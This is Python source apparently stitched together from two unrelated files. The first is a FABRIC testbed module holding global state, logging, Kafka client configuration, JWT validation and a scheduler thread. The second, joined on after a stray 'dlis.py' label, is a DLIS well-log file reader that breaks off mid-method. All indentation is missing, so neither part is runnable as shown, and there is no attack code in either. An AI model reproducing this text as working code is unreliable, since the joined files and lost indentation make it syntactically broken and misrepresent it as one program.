# Copyright (c) 2020 FABRIC Testbed
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
#
# Author: Komal Thareja (kthare10@renci.org)
from __future__ import annotations
import sched
import sys
import threading
import traceback
from datetime import datetime, timedelta
from typing import TYPE_CHECKING
import logging
import os
from fim.graph.neo4j_property_graph import Neo4jGraphImporter
from fim.graph.resources.abc_arm import ABCARMPropertyGraph
from fss_utils.jwt_validate import JWTValidator
from fabric_cf.actor.core.common.exceptions import InitializationException
from fabric_cf.actor.core.common.constants import Constants
from fabric_cf.actor.core.container.container import Container
from fabric_cf.actor.core.util.log_helper import LogHelper
if TYPE_CHECKING:
from fabric_cf.actor.core.apis.abc_actor_container import ABCActorContainer
from fabric_cf.actor.boot.configuration import Configuration
logging.TRACE = 5
logging.addLevelName(logging.TRACE, "TRACE")
logging.Logger.trace = lambda inst, msg, *args, **kwargs: inst.log(logging.TRACE, msg, *args, **kwargs)
logging.trace = lambda msg, *args, **kwargs: logging.log(logging.TRACE, msg, *args, **kwargs)
class Globals:
config_file = Constants.CONFIGURATION_FILE
RPC_TIMEOUT = 0
def __init__(self):
self.config = None
self.log = None
self.initialized = False
self.started = False
self.start_completed = False
self.container = None
self.properties = None
self.timer_scheduler = sched.scheduler()
self.timer_thread = None
self.timer_condition = threading.Condition()
self.lock = threading.Lock()
self.jwt_validator = None
def make_logger(self):
"""
Detects the path and level for the log file from the actor config and sets
up a logger accordingly.
:return: logging.Logger object
"""
log_config = self.config.get_global_config().get_logging()
if log_config is None:
raise RuntimeError('No logging config information available')
log_dir = log_config.get(Constants.PROPERTY_CONF_LOG_DIRECTORY, ".")
log_file = log_config.get(Constants.PROPERTY_CONF_LOG_FILE, "actor.log")
log_level = log_config.get(Constants.PROPERTY_CONF_LOG_LEVEL, None)
log_retain = int(log_config.get(Constants.PROPERTY_CONF_LOG_RETAIN, 50))
log_size = int(log_config.get(Constants.PROPERTY_CONF_LOG_SIZE, 5000000))
logger = log_config.get(Constants.PROPERTY_CONF_LOGGER, "actor")
return LogHelper.make_logger(log_dir=log_dir, log_file=log_file, log_level=log_level, log_retain=log_retain,
log_size=log_size, logger=logger)
@staticmethod
def delete_super_block():
"""
Delete Super block file
"""
if os.path.isfile(Constants.SUPERBLOCK_LOCATION):
os.remove(Constants.SUPERBLOCK_LOCATION)
def create_maintenance_lock(self):
"""
Create maintenance lock file
"""
self.get_logger().debug("Creating maintenance lock")
file = None
try:
file = open(Constants.MAINTENANCE_LOCATION, 'r')
except IOError:
file = open(Constants.MAINTENANCE_LOCATION, 'w')
finally:
if file is not None:
file.close()
@staticmethod
def delete_maintenance_lock():
"""
Delete maintenance block file
"""
if os.path.isfile(Constants.MAINTENANCE_LOCATION):
os.remove(Constants.MAINTENANCE_LOCATION)
@staticmethod
def is_maintenance_mode_on() -> bool:
return os.path.isfile(Constants.MAINTENANCE_LOCATION)
@staticmethod
def can_reload_model() -> bool:
return os.path.isfile(Constants.MODEL_RELOAD_LOCATION)
@staticmethod
def delete_reload_model_state_file():
"""
Delete reload model state file
"""
if os.path.isfile(Constants.MODEL_RELOAD_LOCATION):
os.remove(Constants.MODEL_RELOAD_LOCATION)
def cleanup_neo4j(self):
"""
Cleanup Neo4j on clean restart
"""
self.log.debug("Cleanup Neo4j database started")
config = self.get_config().get_neo4j_config()
neo4j_graph_importer = Neo4jGraphImporter(url=config["url"], user=config["user"],
pswd=config["pass"],
import_host_dir=config["import_host_dir"],
import_dir=config["import_dir"])
neo4j_graph_importer.delete_all_graphs()
self.log.debug("Cleanup Neo4j database completed")
def check_and_reload_model(self, *, graph_id) -> ABCARMPropertyGraph or None:
"""
Reload Neo4j on model restart
"""
if not self.can_reload_model():
return None
self.cleanup_neo4j()
self.log.debug(f"Reload Neo4j database started {graph_id}")
from fabric_cf.actor.fim.fim_helper import FimHelper
arm_graph = FimHelper.get_arm_graph_from_file(filename=self.get_config().get_actor().get_substrate_file(),
graph_id=graph_id)
self.log.debug(f"Reload Neo4j database completed {graph_id}")
return arm_graph
def fail(self, *, e: Exception):
"""
Fail the Actor
@param e exception
"""
self.log.error("Critical error: Actor failed to initialize {}".format(e))
sys.exit(-1)
def initialize(self):
"""
Initialize the container and actor
"""
try:
self.lock.acquire()
if not self.initialized:
self.load_config()
self.log = self.make_logger()
self.log.info("Checking if connection to Kafka broker can be established")
admin_kafka_client = self.get_kafka_admin_client()
admin_kafka_client.list_topics()
self.log.info("Connection to Kafka broker established successfully")
self.load_jwt_validator()
self.log.info("Main initialization complete.")
self.initialized = True
finally:
self.lock.release()
def load_jwt_validator(self):
oauth_config = self.config.get_oauth_config()
CREDMGR_CERTS = oauth_config.get(Constants.PROPERTY_CONF_O_AUTH_JWKS_URL, None)
CREDMGR_KEY_REFRESH = oauth_config.get(Constants.PROPERTY_CONF_O_AUTH_KEY_REFRESH, None)
self.log.info(f'Initializing JWT Validator to use {CREDMGR_CERTS} endpoint, '
f'refreshing keys every {CREDMGR_KEY_REFRESH} HH:MM:SS')
t = datetime.strptime(CREDMGR_KEY_REFRESH, "%H:%M:%S")
self.jwt_validator = JWTValidator(url=CREDMGR_CERTS,
refresh_period=timedelta(hours=t.hour, minutes=t.minute, seconds=t.second))
def load_config(self):
"""
Load the configuration
"""
try:
from fabric_cf.actor.boot.configuration_loader import ConfigurationLoader
loader = ConfigurationLoader(path=self.config_file)
self.config = loader.read_configuration()
self.RPC_TIMEOUT = self.config.get_rpc_request_timeout_seconds()
except Exception as e:
raise RuntimeError("Unable to parse configuration file {}".format(e))
def get_jwt_validator(self):
return self.jwt_validator
def get_container(self) -> ABCActorContainer:
"""
Get the container
@return container
"""
if not self.initialized:
raise InitializationException(Constants.UNINITIALIZED_STATE)
return self.container
def get_config(self) -> Configuration:
"""
Get the configuration
@return config
"""
if not self.initialized:
raise InitializationException(Constants.UNINITIALIZED_STATE)
return self.config
def get_log_config(self) -> dict:
"""
Get the Log configuration
@return dict
"""
return self.get_config().get_log_config()
def get_kafka_config_admin_client(self) -> dict:
"""
Get Kafka Config Admin Client
@return admin client config
"""
if self.config is None or self.config.get_runtime_config() is None:
return None
sasl_username = self.config.get_kafka_prod_user_name()
sasl_password = self.config.get_kafka_prod_user_pwd()
sasl_mechanism = self.config.get_kafka_sasl_mechanism()
conf = {Constants.BOOTSTRAP_SERVERS: self.config.get_kafka_server(),
Constants.SECURITY_PROTOCOL: self.config.get_kafka_security_protocol(),
Constants.SSL_CA_LOCATION: self.config.get_kafka_ssl_ca_location(),
Constants.SSL_CERTIFICATE_LOCATION: self.config.get_kafka_ssl_cert_location(),
Constants.SSL_KEY_LOCATION: self.config.get_kafka_ssl_key_location(),
Constants.SSL_KEY_PASSWORD: self.config.get_kafka_ssl_key_password()}
if sasl_username is not None and sasl_username != '' and sasl_password is not None and sasl_password != '':
conf[Constants.SASL_USERNAME] = sasl_username
conf[Constants.SASL_PASSWORD] = sasl_password
conf[Constants.SASL_MECHANISM] = sasl_mechanism
return conf
def get_kafka_config_producer(self) -> dict:
"""
Get Producer Config
@return producer config
"""
if self.config is None or self.config.get_runtime_config() is None:
return None
sasl_username = self.config.get_kafka_prod_user_name()
sasl_password = self.config.get_kafka_prod_user_pwd()
sasl_mechanism = self.config.get_kafka_sasl_mechanism()
conf = {Constants.BOOTSTRAP_SERVERS: self.config.get_kafka_server(),
Constants.SECURITY_PROTOCOL: self.config.get_kafka_security_protocol(),
Constants.SSL_CA_LOCATION: self.config.get_kafka_ssl_ca_location(),
Constants.SSL_CERTIFICATE_LOCATION: self.config.get_kafka_ssl_cert_location(),
Constants.SSL_KEY_LOCATION: self.config.get_kafka_ssl_key_location(),
Constants.SSL_KEY_PASSWORD: self.config.get_kafka_ssl_key_password(),
Constants.SCHEMA_REGISTRY_URL: self.config.get_kafka_schema_registry(),
Constants.PROPERTY_CONF_KAFKA_REQUEST_TIMEOUT_MS: self.config.get_kafka_request_timeout_ms()}
if sasl_username is not None and sasl_username != '' and sasl_password is not None and sasl_password != '':
conf[Constants.SASL_USERNAME] = sasl_username
conf[Constants.SASL_PASSWORD] = sasl_password
conf[Constants.SASL_MECHANISM] = sasl_mechanism
return conf
def get_kafka_config_consumer(self) -> dict:
"""
Get Consumer config
@return consumer config
"""
if self.config is None or self.config.get_runtime_config() is None:
return None
conf = self.get_kafka_config_producer()
group_id = self.config.get_kafka_cons_group_id()
conf['auto.offset.reset'] = 'earliest'
sasl_username = self.config.get_kafka_cons_user_name()
sasl_password = self.config.get_kafka_cons_user_pwd()
if sasl_username is not None and sasl_username != '' and sasl_password is not None and sasl_password != '':
conf[Constants.SASL_USERNAME] = sasl_username
conf[Constants.SASL_PASSWORD] = sasl_password
conf[Constants.GROUP_ID] = group_id
return conf
def get_kafka_producer(self):
"""
Create and return a kafka producer
@return producer
"""
conf = self.get_kafka_config_producer()
key_schema_file = self.config.get_kafka_key_schema_location()
value_schema_file = self.config.get_kafka_value_schema_location()
from fabric_mb.message_bus.producer import AvroProducerApi
producer = AvroProducerApi(producer_conf=conf, key_schema_location=key_schema_file,
value_schema_location=value_schema_file, logger=self.get_logger())
return producer
def get_kafka_producer_with_poller(self, *, actor):
"""
Create and return a kafka producer
@return producer
"""
conf = self.get_kafka_config_producer()
key_schema_file = self.config.get_kafka_key_schema_location()
value_schema_file = self.config.get_kafka_value_schema_location()
from fabric_cf.actor.core.container.rpc_producer import RPCProducer
producer = RPCProducer(producer_conf=conf, key_schema_location=key_schema_file,
value_schema_location=value_schema_file, logger=self.get_logger(), actor=actor)
return producer
def get_simple_kafka_producer(self):
"""
Create and return a kafka producer
@return producer
"""
conf = self.get_kafka_config_producer()
if conf is not None:
conf.pop(Constants.SCHEMA_REGISTRY_URL)
bqm_config = self.config.get_global_config().get_bqm_config()
if bqm_config is not None:
prod_user_name = bqm_config.get(Constants.PROPERTY_CONF_KAFKA_SASL_PRODUCER_USERNAME, None)
prod_password = bqm_config.get(Constants.PROPERTY_CONF_KAFKA_SASL_PRODUCER_PASSWORD, None)
if prod_user_name is not None and prod_password is not None:
conf[Constants.SASL_USERNAME] = prod_user_name
conf[Constants.SASL_PASSWORD] = prod_password
from confluent_kafka import Producer
producer = Producer(conf)
return producer
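# Usage sketch for the plain producer above (topic name and payload are
# illustrative):
#
#     producer = globals_instance.get_simple_kafka_producer()
#     if producer is not None:
#         producer.produce('bqm.topic', value=b'payload')
#         producer.flush()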
def get_kafka_admin_client(self):
"""
Create and return a kafka admin client
@return admin client
"""
from fabric_mb.message_bus.admin import AdminApi
conf = self.get_kafka_config_admin_client()
admin = AdminApi(conf=conf)
return admin
def get_logger(self):
"""
Get logger
@return logger
"""
if not self.initialized:
raise InitializationException(Constants.UNINITIALIZED_STATE)
if self.log is None:
self.log = self.make_logger()
return self.log
def start(self, *, force_fresh: bool):
"""
Start CF Actor
@param force_fresh true if clean restart, false if stateful restart
"""
try:
try:
self.lock.acquire()
if self.started:
return
self.started = True
self.start_completed = False
if force_fresh:
self.delete_super_block()
finally:
self.lock.release()
self.initialize()
self.start_timer_thread()
try:
self.lock.acquire()
self.container = Container()
self.log.info("Successfully instantiated the container implementation.")
self.log.info("Initializing container")
self.container.initialize(config=self.config)
self.log.info("Successfully initialized the container")
self.start_completed = True
finally:
self.lock.release()
except Exception as e:
self.fail(e=e)
def stop(self):
"""
Stop the Actor
"""
try:
self.lock.acquire()
if not self.started:
return
self.log.info("Stopping Actor")
self.started = False
self.stop_timer_thread()
self.get_container().shutdown()
except Exception as e:
self.log.error("Error while shutting down: {}".format(e))
finally:
self.lock.release()
def start_timer_thread(self):
"""
Start the timer thread
"""
if self.timer_thread is not None:
raise RuntimeError("This timer thread has already been started")
self.timer_thread = threading.Thread(target=self.timer_loop, name='GlobalTimer', daemon=True)
self.timer_thread.start()
def stop_timer_thread(self):
"""
Stop timer thread
"""
temp = self.timer_thread
self.timer_thread = None
if temp is not None:
self.log.warning("It seems that the timer thread is running. Interrupting it")
try:
with self.timer_condition:
self.timer_condition.notify_all()
temp.join()
except Exception as e:
self.log.error("Could not join timer thread {}".format(e))
def timer_loop(self):
"""
Timer thread run function
"""
self.log.debug("Timer thread started")
while True:
with self.timer_condition:
while self.timer_scheduler.empty() and self.started:
try:
#self.log.debug("Waiting for condition")
self.timer_condition.wait()
except InterruptedError as e:
self.log.error(traceback.format_exc())
self.log.error("Timer thread interrupted. Exiting {}".format(e))
return
if not self.started:
self.log.info("Timer thread exiting")
return
self.timer_condition.notify_all()
if not self.timer_scheduler.empty():
#self.log.debug("Executing Scheduled items")
self.timer_scheduler.run(blocking=False)
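# Scheduling work onto this loop (a sketch; delay, priority and callable
# are illustrative). After adding an event, wake the loop via the condition:
#
#     globals_instance.timer_scheduler.enter(delay=5, priority=1,
#                                            action=some_callable)
#     with globals_instance.timer_condition:
#         globals_instance.timer_condition.notify_all()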
class GlobalsSingleton:
"""
Global Singleton class
"""
__instance = None
def __init__(self):
if self.__instance is not None:
raise InitializationException("Singleton can't be created twice!")
@classmethod
def get(cls):
"""
Return the singleton instance, creating it on first access
"""
if cls.__instance is None:
cls.__instance = Globals()
return cls.__instance
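# Typical access pattern (a sketch; the import path is an assumption based
# on the package layout used above):
#
#     from fabric_cf.actor.core.container.globals import GlobalsSingleton
#     globals_instance = GlobalsSingleton.get()
#     logger = globals_instance.get_logger()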
|
dlis.py
|
"""
Python DLIS file reader
Adriano Paulo - adrianopaulo@gmail.com
July 2016
PREFACE:
American Petroleum Institute (API) Standard RP66 Version 1 (RP66 V1),
published in May 1991, specified a format for digital well log data,
called Digital Log Interchange Standard (DLIS).
RP66 V1 publication was under jurisdiction of API until June 1998,
when Petrotechnical Open Software Corporation (POSC) accepted its
stewardship.
In November 2006, POSC re-brands itself as Energistics.
PURPOSE:
This software was created to read DLIS files.
At this time only DLIS Version 1 (RP66 V1) is supported.
SOURCES:
This code was developed based on Energistics RP66 V1 standard:
http://w3.energistics.org/RP66/V1/Toc/main.html
USAGE:
(1) To read a DLIS file into memory, just use:
dlis = DLISFile() (mandatory)
dlis.read(filename) (mandatory)
(2) An example of usage (just an example) can be shown with:
dlis.print_logical_file() (optional)
The function above is just a taste of this DLIS reader; it
produces output like this:
Logical File: 0
1&0&B61441
#1
0&0&INDEX : 1640.375 m
1&0&DT : -999.25 us/ft
1&0&GR : 51.84400177 gAPI
1&0&ILD : 0.0189999993891 ohm.m
1&0&CALI : 12.3409996033 in
1&0&RHOB : 4.29400014877 g/cm3
1&0&NPHI : 0.675999999046 m3/m3
#2
0&0&INDEX : 1640.5 m
1&0&DT : -999.25 us/ft
1&0&GR : 55.9160003662 gAPI
1&0&ILD : 0.0189999993891 ohm.m
1&0&CALI : 12.3509998322 in
1&0&RHOB : 4.29400014877 g/cm3
1&0&NPHI : 0.65030002594 m3/m3
...
#n
(3) For real usage, use these data structures:
- dlis.data: a list of Logical Well data. Each Logical Well data
is an OrderedDict with the object name as key and
another OrderedDict as its value; that inner OrderedDict
uses the data index (e.g. #1, #2, #n) as key and a list
of values as its value. These lists hold the actual
log data values. The structure is illustrated below.
-> Logical Well Data 1
-> Logical Well Data 2
--> (object_name_1, object_dict_1), where object_dict_1 is:
---> (data_index_1, list_of_values_1)
---> (data_index_2, list_of_values_2)
---> (data_index_n, list_of_values_n)
--> (object_name_2, object_dict_2)
--> (object_name_n, object_dict_n)
-> Logical Well Data n
- dlis.data_props: a list of Logical Well properties. Each Logical
Well properties entry is an OrderedDict with the object
name as key and another OrderedDict as its value.
- dlis.SUL: an OrderedDict of Storage Unit Label fields (header parameters).
- dlis.file_header = None
- dlis.origin = None
- dlis.parameter = None
- dlis.frame = None
- dlis.channel = None
"""
import os
import struct
from collections import OrderedDict
import numpy as np
import app
# from multiprocessing import Process, Queue
# import threading
# import utils
def _get_value(data, format_, big_endian=True):
big = ''
if big_endian:
big = '>'
format_ = big + format_
try:
# print()
# print(data, type(data))
n = struct.unpack(format_, data)
# print(n)
# print(n[0], type(n[0]))
# print()
return n[0]
except Exception:
raise
def get_from_list(data_list, start_offset, code, size=None):
code_spec = RepresentationCodes.get_code(code)
# print()
# print('\nget_from_list', start_offset, code, code_spec)
if code_spec is None:
msg = 'Code ' + str(code) + ' is not recognized.'
raise Exception(msg)
special = code_spec.get('special')
if special is None:
if code_spec.get('size') != "variable":
size = code_spec.get('size')
return start_offset + size, \
_get_value(data_list[start_offset:start_offset + size],
code_spec.get('format'))
else:
raise Exception()
if special:
if code == 1:
raise Exception()
'''
v1 = ord(data_list[start_offset:start_offset+1])
v2 = ord(data_list[start_offset+1:start_offset+2])
result = bin(v1)[2:].zfill(8)
result += bin(v2)[2:].zfill(8)
fraction = result[1:12]
exponent = result[12:16]
if result[0] == '0':
exponent = int(exponent, 2)
fraction = int(fraction, 2) / 2. ** 23
value = fraction * 2. ** (exponent)
else:
converted_exponent = ''
for i in range(8):
if exponent[i] == '0':
converted_exponent += '1'
else:
converted_exponent += '0'
exponent = int(converted_exponent, 2)
converted_fraction = ''
achou = False
for i in range(22, -1, -1):
if achou:
if fraction[i] == '0':
converted_fraction = '1' + converted_fraction
else:
converted_fraction = '0' + converted_fraction
else:
converted_fraction = fraction[i] + converted_fraction
if fraction[i] == '1':
achou = True
fraction = int(converted_fraction, 2) / 2. ** 23
fraction = fraction * (-1)
value = fraction * 2. ** (exponent - 128)
return start_offset+2, value
'''
elif code == 2:
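# FSINGL: IEEE 754 single precision decoded bit by bit below; for normal
# numbers this is equivalent to struct.unpack('>f', data)[0].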
values = []
for i in range(4):
v = ord(data_list[start_offset + i:start_offset + i + 1])
values.append(v)
result = ''
for value in values:
result += bin(value)[2:].zfill(8)
exponent = result[1:9]
mantissa = result[9:32]
exponent = int(exponent, 2)
mantissa = int(mantissa, 2) / 2. ** 23
if result[0] == '1':
value = -(1 + mantissa) * 2. ** (exponent - 127)
else:
value = (1 + mantissa) * 2. ** (exponent - 127)
return start_offset + 4, value
elif code == 3:
new_offset, V = get_from_list(data_list, start_offset, 2) # FSINGL
new_offset, A = get_from_list(data_list, new_offset, 2) # FSINGL
# V is a nominal value with a confidence interval of [V - A, V + A]
return new_offset, V, A
elif code == 4:
new_offset, V = get_from_list(data_list, start_offset, 2) # FSINGL
new_offset, A = get_from_list(data_list, new_offset, 2) # FSINGL
new_offset, B = get_from_list(data_list, new_offset, 2) # FSINGL
# V is a nominal value with a confidence interval of [V - A, V + B]
return new_offset, V, A, B
elif code == 5:
values = []
for i in range(4):
v = ord(data_list[start_offset + i:start_offset + i + 1])
values.append(v)
result = ''
for value in values:
result += bin(value)[2:].zfill(8)
exponent = result[1:8]
mantissa = result[8:32]
exponent = int(exponent, 2)
mantissa = int(mantissa, 2)
if result[0] == '1':
value = -1 * mantissa * 16. ** (exponent - 64)
else:
value = mantissa * 16. ** (exponent - 64)
return start_offset + 4, value
#
elif code == 6:
raise Exception('Representation code 6 (VSINGL) is not supported.')
#
elif code == 7:
values = []
for i in range(8):
v = ord(data_list[start_offset + i:start_offset + i + 1])
values.append(v)
result = ''
for value in values:
result += bin(value)[2:].zfill(8)
exponent = result[1:12]
mantissa = result[12:64]
exponent = int(exponent, 2)
mantissa = int(mantissa, 2)
if result[0] == '1':
value = -1 * (1 + mantissa) * 2. ** (exponent - 1023)
else:
value = (1 + mantissa) * 2. ** (exponent - 1023)
return start_offset + 8, value
elif code == 8:
new_offset, V = get_from_list(data_list, start_offset, 7) # FDOUBL
new_offset, A = get_from_list(data_list, new_offset, 7) # FDOUBL
# V is a nominal value with a confidence interval of [V - A, V + A]
return new_offset, V, A
elif code == 9:
new_offset, V = get_from_list(data_list, start_offset, 7) # FDOUBL
new_offset, A = get_from_list(data_list, new_offset, 7) # FDOUBL
new_offset, B = get_from_list(data_list, new_offset, 7) # FDOUBL
# V is a nominal value with a confidence interval of [V - A, V + B]
return new_offset, V, A, B
elif code == 10:
new_offset, R = get_from_list(data_list, start_offset, 2) # FSINGL
new_offset, I = get_from_list(data_list, new_offset, 2) # FSINGL
# Value = R + i* I, i = (-1)1/2
return new_offset, R, I
elif code == 11:
new_offset, R = get_from_list(data_list, start_offset, 7) # FDOUBL
new_offset, I = get_from_list(data_list, new_offset, 7) # FDOUBL
# Value = R + i* I, i = (-1)1/2
return new_offset, R, I
elif code == 18 or code == 22:
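# UVARI (code 18) / ORIGIN (code 22): RP66 variable-length unsigned
# integer. The leading bits of the first byte select the width:
# '0' -> 1 byte, '10' -> 2 bytes, '11' -> 4 bytes.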
# print data_list[start_offset:start_offset+1]
try:
bin_vec = bin(ord(data_list[start_offset:start_offset + 1]))[2:].zfill(8)
except Exception:
print('start_offset:', start_offset, len(data_list))
raise Exception('Check for IndexError')
if bin_vec[0] == '0':
return start_offset + 1, int(bin_vec, 2)
else:
if bin_vec[1] == '0':
bin_vec = '0' + bin_vec[1:]
bin_vec += bin(ord(data_list[start_offset + 1:start_offset + 2]))[2:].zfill(8)
return start_offset + 2, int(bin_vec, 2)
else:
bin_vec = '00' + bin_vec[2:]
bin_vec += bin(ord(data_list[start_offset + 1:start_offset + 2]))[2:].zfill(8)
bin_vec += bin(ord(data_list[start_offset + 2:start_offset + 3]))[2:].zfill(8)
bin_vec += bin(ord(data_list[start_offset + 3:start_offset + 4]))[2:].zfill(8)
return start_offset + 4, int(bin_vec, 2)
elif code == 19 or code == 27:
new_offset, value = get_from_list(data_list, start_offset, 15) # USHORT
return new_offset + value, \
data_list[new_offset:new_offset + value].decode("utf-8")
elif code == 20:
new_offset, value = get_from_list(data_list, start_offset, 18) # UVARI
return new_offset + value, \
data_list[new_offset:new_offset + value].decode("utf-8")
elif code == 21:
dtime = OrderedDict()
new_offset, year = get_from_list(data_list, start_offset, 15) # USHORT
year = 1900 + year
dtime['Y'] = year
v1 = ord(data_list[new_offset:new_offset + 1])
new_offset += 1
result = bin(v1)[2:].zfill(8)
tz = result[0:4]
m = result[4:8]
dtime['TZ'] = tz
dtime['M'] = m
new_offset, day = get_from_list(data_list, new_offset, 15) # USHORT
dtime['D'] = day
new_offset, hours = get_from_list(data_list, new_offset, 15) # USHORT
dtime['H'] = hours
new_offset, minutes = get_from_list(data_list, new_offset, 15) # USHORT
dtime['MN'] = minutes
new_offset, seconds = get_from_list(data_list, new_offset, 15) # USHORT
dtime['S'] = seconds
new_offset, milliseconds = get_from_list(data_list, new_offset, 16) # UNORM
dtime['MS'] = milliseconds
return new_offset, dtime
elif code == 23:
new_offset, O = get_from_list(data_list, start_offset, 22) # ORIGIN
new_offset, C = get_from_list(data_list, new_offset, 15) # USHORT
new_offset, I = get_from_list(data_list, new_offset, 19) # IDENT
return new_offset, (O, C, I)
# O = Origin Reference
# C = Copy Number
# I = Identifier
elif code == 24:
new_offset, T = get_from_list(data_list, start_offset, 19) # IDENT
new_offset, N = get_from_list(data_list, new_offset, 23) # OBNAME
objref = OrderedDict()
objref['T'] = T
objref['N'] = N
# T = obj type - N = obj name
return new_offset, objref
elif code == 25:
new_offset, T = get_from_list(data_list, start_offset, 19) # IDENT
new_offset, N = get_from_list(data_list, new_offset, 23) # OBNAME
new_offset, L = get_from_list(data_list, new_offset, 19) # IDENT
# T = Object Type
# N = Object Name
# L = Attribute Label
return new_offset, (T, N, L)
elif code == 26:
new_offset, value = get_from_list(data_list, start_offset, 15) # USHORT
if value == 0:
return new_offset, False
if value == 1:
return new_offset, True
raise Exception('Invalid STATUS value: ' + str(value))
elif code == 28:
v1 = ord(data_list[start_offset:start_offset + 1])
result = bin(v1)[2:].zfill(8)
ret = []
for i in range(len(result)):
ret.append(int(result[i]))
return start_offset + 1, ret
"""
0: Logical Record Structure
0 = Indirectly Formatted Logical Record
1 = Explicitly Formatted Logical Record
1: Predecessor
0 = This is the first segment of the Logical Record
1 = This is not the first segment of the Logical Record
2: Successor
0 = This is the last Segment of the Logical Record.
1 = This is not the last Segment of the Logical Record
3: Encryption
0 = No encryption.
1 = Logical Record is encrypted
4: Encryption Packet
0 = No Logical Record Segment Encryption Packet
1 = Logical Record Segment Encryption Packet is present
5: Checksum
0 = No checksum
1 = A checksum is present in the LRST
6: Trailing Length
0 = No Trailing Length
1 = A copy of the LRS length is present in the LRST
7: Padding
0 = No record padding
1 = Pad bytes are present in LRST
"""
"""
Given an Explicitly Formatted Logical Record (EFLR) code, returns its type,
description and allowed set types.
"""
'''
def get_EFLR_for_code(EFLR_code):
if not isinstance(EFLR_code, int):
raise Exception('EFLR_code must be a int value.')
if EFLR_code < 0 or EFLR_code > 127:
raise Exception('EFLR code does not exist.')
if EFLR_code > 11:
raise Exception('Undefined or reserved EFLR codes are not available at this time.')
ret = {}
if EFLR_code == 0:
ret['type'] = 'FHLR'
ret['desc'] = 'File Header'
ret['allow'] = ['FILE-HEADER']
elif EFLR_code == 1:
ret['type'] = 'OLR'
ret['desc'] = 'Origin'
ret['allow'] = ['ORIGIN', 'WELL-REFERENCE']
elif EFLR_code == 2:
ret['type'] = 'AXIS'
ret['desc'] = 'Coordinate Axis'
ret['allow'] = ['AXIS']
elif EFLR_code == 3:
ret['type'] = 'CHANNL'
ret['desc'] = 'Channel-related information'
ret['allow'] = ['CHANNEL']
elif EFLR_code == 4:
ret['type'] = 'FRAME'
ret['desc'] = 'Frame Data'
ret['allow'] = ['FRAME', 'PATH']
elif EFLR_code == 5:
ret['type'] = 'STATIC'
ret['desc'] = 'Static Data'
ret['allow'] = ['CALIBRATION', 'CALIBRATION-COEFFICIENT', \
'CALIBRATION-MEASUREMENT', 'COMPUTATION', 'EQUIPMENT', 'GROUP',\
'PARAMETER', 'PROCESS', 'SPICE', 'TOOL', 'ZONE']
elif EFLR_code == 6:
ret['type'] = 'SCRIPT'
ret['desc'] = 'Textual Data'
ret['allow'] = ['COMMENT']
elif EFLR_code == 7:
ret['type'] = 'UPDATE'
ret['desc'] = 'Update Data'
ret['allow'] = ['UPDATE']
elif EFLR_code == 8:
ret['type'] = 'UDI'
ret['desc'] = 'Unformatted Data Identifier'
ret['allow'] = ['NO-FORMAT']
elif EFLR_code == 9:
ret['type'] = 'LNAME'
ret['desc'] = 'Long Name'
ret['allow'] = ['LONG-NAME']
elif EFLR_code == 10:
ret['type'] = 'SPEC'
ret['desc'] = 'Specification'
ret['allow'] = ['ATTRIBUTE', 'CODE', 'EFLR', 'IFLR', 'OBJECT-TYPE',\
'REPRESENTATION-CODE', 'SPECIFICATION', 'UNIT-SYMBOL']
elif EFLR_code == 11:
ret['type'] = 'DICT'
ret['desc'] = 'Dictionary'
ret['allow'] = ['BASE-DICTIONARY', 'IDENTIFIER', 'LEXICON', 'OPTION']
return ret
'''
def get_objname_from_tuple(obj_name_tuple):
"""Given a O, C, I tuple, return its string full name
(e.g 0&0&DEFINING_ORIGIN).
"""
O, C, I = obj_name_tuple
return str(O) + '&' + str(C) + '&' + I
def get_actual_objname(full_object_name):
"""Given a object string full name (e.g 0&0&DEFINING_ORIGIN), returns
its name (e.g DEFINING_ORIGIN).
"""
return full_object_name.split('&')[2]
class RepresentationCodes(object):
instance = None
def __init__(self):
# base_path == this folder
base_path = os.path.dirname(os.path.abspath(__file__))
rc_json_file = 'representation_codes.json'
self.codes = app.app_utils.read_json_file(
os.path.join(base_path, rc_json_file)
)
@classmethod
def start(cls):
if cls.instance is None:
cls.instance = RepresentationCodes()
@classmethod
def get_code(cls, code):
val = None
if cls.instance:
val = cls.instance.codes[code - 1]
return val
class DLISObjectPool(object):
current_file_number = -1
current_lr = -1
lrs = None
objects = None
lr_to_object = None
object_to_lr = None
@classmethod
def init_pool(cls):
"""Init DLISObjectPool attributes.
"""
cls.current_file_number = -1
cls.current_lr = -1
cls.lrs = OrderedDict()
cls.objects = OrderedDict()
cls.lr_to_object = OrderedDict()
cls.object_to_lr = OrderedDict()
@classmethod
def register_logical_record(cls, lr_structure_type, lr_type, lr_code):
"""Register a new Logical Record, with its structure type, LR type,
LR code.
"""
if lr_structure_type != 0 and lr_structure_type != 1:
raise Exception('Logical Record Structure type invalid. ' +
'Valid types are 0 for IFLRs or 1 for EFLR.')
# Starting a new logical file
if lr_type == 'FILE-HEADER':
if cls.lrs is None:
cls.init_pool()
cls.current_file_number += 1
cls.lrs[cls.current_file_number] = OrderedDict()
cls.lr_to_object[cls.current_file_number] = OrderedDict()
cls.object_to_lr[cls.current_file_number] = OrderedDict()
cls.current_lr = 0
else:
cls.current_lr += 1
new_set = OrderedDict()
new_set['type'] = lr_type
new_set['code'] = lr_code
new_set['structure_type'] = lr_structure_type
new_set['template'] = []
new_set['closed'] = False
cls.lrs.get(cls.current_file_number)[cls.current_lr] = new_set
cls.lr_to_object.get(cls.current_file_number)[lr_type] = []
@classmethod
def register_object(cls, object_name):
"""Register a new DLIS Object, with its name.
"""
if not cls.get_logical_records()[-1].get('closed'):
cls.get_logical_records()[-1]['closed'] = True
if cls.objects.get(cls.current_file_number) is None:
cls.objects[cls.current_file_number] = OrderedDict()
